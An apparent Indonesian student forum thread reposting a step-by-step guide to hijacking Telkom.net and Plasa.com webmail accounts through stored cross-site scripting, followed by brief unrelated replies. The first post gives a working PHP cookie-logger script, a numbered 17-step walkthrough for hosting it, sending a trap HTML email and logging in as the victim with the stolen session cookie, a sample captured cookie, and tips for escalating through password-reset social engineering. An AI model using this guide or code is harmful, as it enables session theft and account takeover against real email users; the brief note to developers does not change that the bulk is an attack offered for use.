Binusian Discussion

Forum Discussion Binusian
 
HomeCalendarFAQSearchRegisterMemberlistUsergroupsLog in

Share | 
 

 HAcking TElkomnet n PLasa telkom

View previous topic View next topic Go down 
AuthorMessage
CeweSakti
Commander
Commander


Posts : 191
Join date : 2008-02-09
Age : 25

PostSubject: HAcking TElkomnet n PLasa telkom   Fri Feb 15, 2008 6:26 pm

Plasa.com adalah sebuah website yang menyediakan cukup banyak layanan, dan sepertinya merupakan sebuah affiliates inti Telkom.net (PT. Telekomunikasi Indonesia). Walaupun keduanya diketahui sebagai website besar, yang juga dipercaya memiliki security yang bisa dikatakan baik (Mengingat mereka adalah perusahaan komunikasi terbesar Indonesia), kenyataan ternyata berbicara lain.


Terhitung pada hari ini (17 October 2006), Th0R bersama dengan SATE (Security Advisory TEam), telah menemukan beberapa kebocoran yang cukup signifikan dalam keamanan pada kedua website tersebut. Pada kesempatan kali ini, kita akan coba membahas mengenai kebocoran yang ada pada website mereka ..

Boleh donk sesekali beralih ke Telkom, setelah bosan dengan Yahoo ..

Mengenal Kebocoran nya

Memang baik bagi telkom maupun plasa.com untuk membuat fitur HTML lgsg pada email mereka, lagipula mereka memang melakukan pengamanan pada penggunaan HTML di inbox mereka sendiri, dengan melakukan filtering beberapa codes yang ada ..

Namun, sesuai dengan legenda yang telah sering terhembuskan oleh angin, XSS (Cross Site Scripting), ternyata memang benar adalah sebuah serangan yang paling mengerikan yang pernah ada. Walaupun sudah di filter sedemikian rupa, perusahaan raksasa di Indonesia (Telkom), ternyata masih memiliki fungsi Human Error, yang membuat mereka lupa melakukan filtering pada beberapa fungsi lain yang bisa dikatakan memang tidak begitu BISA untuk di execute ..

Exploit & PoC

Apabila kalian login masuk ke dalam WebMail mereka, baik telkom.net maupun plasa.com ternyata mereka masuk ke dalam satu server yang serupa, dan tentunya segala sesuatu nya juga bisa dikatakan serupa .. Sehingga KEBOCORANNYA pun serupa .. Hehehe ..

Yang membuat mereka bocor adalah penggunaan HTML nya ..

Dimana apabila kalian melakukan sending email yang berisikan:





Dan mengirimkannya dengan modul HTML seperti yang disediakan oleh pihak mereka sendiri di webmailnya ..

Maka setiap orang yang membuka email mereka dan melewatkan Crusor keatas email tersebut, cookies nya akan ter-record melalui c.php yang telah saya pasangkan ..

C.php nya sendiri memiliki code berikut ini:


$cookie = $_GET['c'];

$ip = getenv ('REMOTE_ADDR');

$date=date("j F, Y, g:i a");

$referer=getenv ('HTTP_REFERER');

$fp = fopen('cookies.txt', 'a');

fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.'


'); fclose($fp); ?>

Penggunaan Exploit

1. Copy code C.php diatas ..

2. Paste dalam notepad ..

3. Lakukan 'save as' ..

4. Simpan dengan nama c.php .. (Atau nama apa saja dengan format: .php) 5. Setelah itu, buatlah sebuah text file kosong dengan nama cookies.txt 6. Hostingkan ke 2 nya dalam sebuah hosting yang mengijinkan PHP codes .. (Contoh http://www.byethost.com)

7. Lalu copy lah code yang 1 lagi:





8. Ubah http://shinigami.byethost32.com/c.php menjadi alamat tempat kamu menaruhkan C.php milik kamu ..

9. Paste kan code diatas ke dalam email ..

10. Set pengiriman dengan menggunakan modul HTML ..

11. Tunggu lah target anda melakukan checking email ..

12. Check lah kalau kalau ada logged cookies di cookies.txt anda yang telah terhostingkan ..

13. Dan apabila ada muncul yang kira kira seperti ini:

206.222.15.234 :: 10/17/2006 2:49:05 am

http://mail1.plasa.com/Session/227502-UPcQoxKIVTIeAXZisu91-kmbcuwc/Message.wssp?Mailbox=INBOX&MSG=7&PrintVersion=& :: plasaUserID=th0r; plasaFullName=Rex Carlton; plasaUniqId=8d18f0e0e0e78f5816095b36abad73b0; validUser=734c2b0266483d6540855081d8ed7e15

Artinya target anda telah membuka email jebakan anda ..

14. Pergilah login ke dalam plasa.com / telkom.net milik kalian sendiri ..

15. Lakukan cookie editing, dan mengganti plasaUserID, plasaFullName, plasaUniqID, dan ValidUser sesuai dengan yang anda dapatkan dari target anda ..

16. Refresh page ..

17. Viola .. !! U now logged in as target ..

Penerapan lebih lanjut

Seperti yang kita ketahui, sebagian orang mgkn menggunakan password pada beberapa account penting mereka dengan password yang sama .. So, untuk mendapatkan plain-text password, kalian bisa melakukan sedikit Social Engineering, dengan melakukan lupa pas, pada Friendster.com misalnya, atau web lain, yang nantinya membuat plain-text password mereka terkirim ke alamat email mereka di plasa.com atau telkom.net itu sendiri ..

Atau dengan cara lain ..

Itu gak sulit ..

Ternyata, plasa.com dan telkom.net memberikan Semua Informasi penting dan tidak penting yang tercantum pada profile anda, tanpa encryption method, lgsg pada bagian Edit Profile .. Hal ini membuat para penyerang mampu mendapatkan Secret Question dan Answer nya, lalu memungkinkan mereka melakukan Lupa Password ..

Ridiculous isnt it?! Hehehe~~

Catatan Penting

- Perlu diingat bahwa ini bukanlah satu2nya vulnerabilities yang ada pada plasa.com ataupun telkom.net

- Penggunaan HTML pada body email juga bukan merupakan satu2nya kelemahan

Catatan Untuk Developer

- Mohon agar Telkom.net dan Plasa.com melakukan re-check terhadap keamanan mereka, dan melakukan filtering yang lebih terhadap penggunaan HTML di dalam email mereka ..

- Hilangkan segala jenis XSS yang bekerja pada website mereka (Sejauh ini terdapat puluhan XSS working on their site).




terakhir masih bisa...Coba lage

gw dah lama gak coba
Back to top Go down
View user profile
anthonymcfla
Vice Admiral
Vice Admiral


Posts : 386
Join date : 2008-01-11
Age : 24
Location : @ HoM3 laa...

PostSubject: Re: HAcking TElkomnet n PLasa telkom   Fri Feb 22, 2008 11:14 pm

Binguunngg........
I'll read it, next time... scratch
Back to top Go down
View user profile
CeweSakti
Commander
Commander


Posts : 191
Join date : 2008-02-09
Age : 25

PostSubject: Re: HAcking TElkomnet n PLasa telkom   Sat Feb 23, 2008 10:18 pm

wew,simpan aja trus buka offline.khan isa jkj
Back to top Go down
View user profile
anthonymcfla
Vice Admiral
Vice Admiral


Posts : 386
Join date : 2008-01-11
Age : 24
Location : @ HoM3 laa...

PostSubject: Re: HAcking TElkomnet n PLasa telkom   Tue Feb 26, 2008 2:15 pm

Malez ah....Hihihii...Thanks... Very Happy
Keep posting!!! Rolling Eyes cheers
Back to top Go down
View user profile
Sponsored content




PostSubject: Re: HAcking TElkomnet n PLasa telkom   Today at 4:47 am

Back to top Go down
 
HAcking TElkomnet n PLasa telkom
View previous topic View next topic Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Binusian Discussion :: HOBBY :: Computer Stuff :: Cracking, Hacking & Cheat-
Jump to: